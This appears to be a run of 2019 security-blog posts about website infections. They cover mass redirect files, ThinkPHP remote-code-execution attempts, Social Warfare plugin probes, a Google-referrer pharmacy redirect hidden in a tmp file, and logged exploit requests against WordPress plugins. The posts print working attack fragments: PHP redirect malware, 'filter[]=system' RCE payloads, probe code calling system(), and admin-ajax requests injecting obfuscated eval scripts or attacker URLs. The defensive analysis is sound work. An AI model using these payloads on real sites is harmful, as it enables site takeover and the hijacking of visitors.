Thousands of Redirecting Files

We recently cleaned a site where we found thousands of malicious files with the following content:

<?php
header ( "HTTP/1.1 301 Moved Permanently" ) ;
header ( "Location: hxxp://realprofit[.]su/" ) ;
?>

and

<?php
header ( "HTTP/1.1 301 Moved Permanently" ) ;
header ( "Location: hxxp://profitnow[.]su/" ) ;
?>

All files were located in the site root directory and had names derived from a person's first names: mccarphy.php, viva.php, lotta.php, sang.php, trine.php, liviu.php, taylar.php, golden.php, staphane, stanislav.php, ismail.php, jerusha.php, menda.php, niel.php, samaira.php, kaa.php, franky.php etc.

Most likely these files are used in an email malware campaign. We found an analysis of one malicious .doc file that made requests to several domains, including realprofit[.]su, and then saved the response as an .exe file and executed it.

This particular wave of the attack is known to infect many sites. Profitnow[.]su was created on November 28, 2018, and according to RiskIQ, 700+ sites redirected there. Realprofit[.]su was created on December 6, 2018, and 500+ sites redirected there.

Some other domains used in this malware campaign:

out36.selfsend.ru
to5.topwenches[.]com
trybestsale[.]su
onlinehotprice[.]su
saleallshop[.]su
bestshopmaster[.]su
Apr 17, 2019 by Denis Sinegubko

ThinkPHP 5.x – Remote Code Execution Actively Exploited...

Earlier this year, we noticed an increase in attacks aiming at ThinkPHP. ThinkPHP is a PHP framework that is very popular in Asia. If you keep track of your site’s activity, the following log may look familiar:

POST: /index.php?s=captcha HTTP/1.1
Data: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig

In December 2018, a working exploit was released for the versions v5.0.23 and v5.1.31. Then, ThinkPHP team released a new version partially fixing the problem. Here is a snippet of the patch:

$method = strtoupper($_POST[Config::get('var_method')]); 
- $this->{$this->method}($_POST); 
+ if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) { 
+ $this->method = $method; 
+ $this->{$this->method}($_POST); 
+ }

Remote Code Execution on ThinkPHP

Basically, they filtered the parameter method to only accept legit values since later on the code function filterValue() passes the filter parameter directly to the PHP function call_user_func() leading to a remote code execution (RCE). Unfortunately, after reversing the patch, attackers also found that reaching the filterValue() function is still possible with an even simpler payload:

data: a=system&b=id&_method=filter  (some important data and more payloads were skipped here)

Affected Versions of ThinkPHP

Versions 5.1.x/ 5.2.x are still affected and since there's no strict validation of user input, bots were programmed to use a new variety of payloads to evade WAFs and previous fixes.

Attackers are exploiting this vulnerability to upload cryptominers. The following is the most recent domains hosting malicious binaries:

hxxp:// love[.]thotiana.live/bins/x86[.]bot
hxxp:// fid[.]hognoob[.]se/download[.]exe

Conclusion

As always, we recommend keeping your software up to date and use a WAF as a second layer of protection since sometimes developers fall short of solving security issues.

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Apr 8, 2019 by John Castro

Social Warfare Vulnerability Probes

After a recent disclosure of the Social Warfare plugin vulnerability, we’ve seen massive attacks that inject malicious JavaScripts into the plugin options.

The vulnerability has been patched in version 3.5.3 of the plugin, so not all sites with that plugin are now vulnerable. To find actually vulnerable sites, hackers scan the Internet and probe the sites. However, instead of using the file with code that actually changes the settings, they just specify a file with a PHP code that returns a predefined text for vulnerable sites.

Here are some of the URLs of such probe files detected by our firewall:

<pre>hxxp://<strong>thehuglaw[.]com</strong>/cache/wq.txthxxp://<strong>www.fdqyj[.]com</strong>/lang/wp2.txthxxp://<strong>www.fdqyj[.]com</strong>/lang/wp3.txthxxp://<strong>kidsinthehouse[.]com</strong>/all-backup/libraries/share/fonts/tresz.txthxxp://<strong>kidsinthehouse[.]com</strong>/all-backup/libraries/share/fonts/551.txthxxps://<strong>gist.githubusercontent.com/kolzdnoy71</strong>/ef026d1b2587371fdc6b28a9a21249dd/raw/628d8b376d2122580d6fcbc63c41ea9778473b8f/gistfile1.txt...</pre>

They have very simple PHP code inside <pre> tags. For example:

<pre>print(7457737+736723);</pre>

Or

<pre>system('echo dfdffg34dfg')</pre>

Some of such files are hosted on compromised third-party sites and, at this point, some of them have already been removed.

Hacked sites are not the only option used by the attackers. We’ve seen them using Pastebin links (Pastebin removes them after abuse reports). Another option that you can see in the list above, is Github, and specifically their Gist service.

In case of the above Gist link, the user who created it (kolzdnoy71) has joined GitHub just on March 27, 2019.

Mar 29, 2019 by Denis Sinegubko

Conditional redirection to an online pharmacy store

During an investigation, a client reported some weird behavior from all incoming visits during their Google search engine result clicks are instantly redirected to an online pharmacy store.

This occurred with visits that were initiated by clicking on any of their indexed search results at Google.com.

The malware caused all incoming visits from Google.com searches to be automatically redirected to hxxxs://pharm-bay(.) com.

After further investigation, the hacker simply hid the malicious code in an extensionless file called “log” in their tmp folder.

The malicious file was then loaded by ./wp-config.php as they had an include PHP function to load that log file.

Here is the conditional redirection rule snippet from the /tmp/logfile.

...if($content = $client->getContent()){if( (strpos($_SERVER['<strong>HTTP_USER_AGENT</strong>'], <strong>google</strong>)  !== false ) || (strpos($_SERVER['<strong>HTTP_USER_AGENT</strong>'], <strong>bot</strong>)  !== false ) ){echo $content;die;}elseif((strpos($_SERVER['<strong>HTTP_REFERER</strong>'], <strong>google</strong>)  !== false ) || (strpos($_SERVER['<strong>HTTP_REFERER</strong>'], <strong>bing</strong>)  !== false )){if($_SERVER[<strong>REQUEST_URI</strong>]!=<strong>/</strong>){?><<strong>script</strong> src=hxxp://<strong>scipton(.)com/doorways/default/script/script4.js</strong>></script><?php die;}}}...

As you can see, the malicious code is checking if the referrer is set to Google or Bing, and if so, it will serve the malicious JavaScript redirecting it to the hxxxs://pharm-bay(.)com pharmacy store.

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Mar 28, 2019 by Moe Obaid

Super Amazon Banners plugin gone rogue

During a recent investigation we found the plugin Super Amazon Banners to be serving malware/spam via the domain seoranker[.]info. We suspect that the domain expired and was registered by somebody else who is using it to serve the malware now.

The plugin causes this javascript to try and load a popup (popupHtml) with many spam links to external sites. Also appears to be causing loading issues and some pages refuse to load at all:

(function() {'use strict'; if (window['shbNetLoaded']) return;window['shbNetLoaded'] = true;var popupHtml =

Here is a screenshot of the code the plugin is trying to load:

The issue was reported to WordPress and the plugin can no longer be downloaded, it was closed. We recommend removing the plugin from your WordPress site if you are using it.

Mar 26, 2019 by Krasimir Konov

Multi-Vector Attack in Server Logs

We recently noticed an increase on suspicious requests in our logs which reveal a planned attack against the Social Warfare plugin. Bad actors added this brand new exploit to an existing campaign, which includes other vulnerable plugins and themes, to inject malicious scripts.


Plugins and themes under attack

Some of the Payloads Used by Bots

WordPress GDPR Compliance

145.239.54.77 - action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22siteurl%22%2C%22value%22+%3A%22https%3A%2F%2Fverybeatifulpear .com%2Fjava.js%3Ft%3D2%26%22%7D&security= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Newspaper WP Theme

31.208.43.209 - action=td_ajax_update_panel&wp_option%5Bhome%5D=https%3A%2F%2Fredrentalservice .com [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Social Warfare Plugin

91.134.215.233 - - [Date] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=hxxp://109.234 .34 .22/mv.txt HTTP/1.1"

Smart Google Code Inserter

1.208.43.209 - action=savegooglecode&sgcgoogleanalytic=%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+...skipped...+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E&sgcwebtools= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"code redirects to hxxps://redrentalservice[.]com/?t4

Education WP Theme

34.194.221.173 - action=thim_update_theme_mods&thim_key=thim_google_analytics&thim_value=X%3C%2Fscript%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+114%2C+101%2C+110%2C+116%2C+97%2C+108%2C+115%2C+101%2C+114%2C+118%2C+105%2C+99%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+63%2C+116%2C+52%2C...skipped...97%2C+59%2C+32%2C+119%2C+105%2C+110%2C+100%2C+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E%3Cscript%3E "POST /wp-admin/admin-ajax.php

Malicious Domains and IPs:

IPs:

31.208.43.20991.134.215.23334.194.221.173128.199.114.0162.243.1.231145.239.54.77185.136.85.47222.73.242.180109.234.34.22

URLs:

hxxps://redrentalservice[.]com/tpn1.jshxxp://raiserate[.]com/mv.txthxxp://109.234 .34 .22/mv.txthxxps://verybeatifulpear[.]comhxxps://blueeyeswebsite[.]comhxxp://r-y-p[.]org/options.txthxxps://teutorrent.com/wp-includes/js/javascript-mini.js
Mar 25, 2019 by John Castro

From Fake Updates to Unwanted Redirects

At the end of February, we wrote about a massive wave of site infections that pushed fake browser updates.

In the beginning of March, the attack evolved into redirecting site visitors to sketchy ad URLs.


In WordPress, the injected script is typically found at the bottom of footer.php files of the active theme. It still comprises of an "eval(function(p,a,c,k,e,d)...” obfuscated script and Histats code with the same 4214393 ID (which is now found on 1564 sites).

Mar 8, 2019 by Denis Sinegubko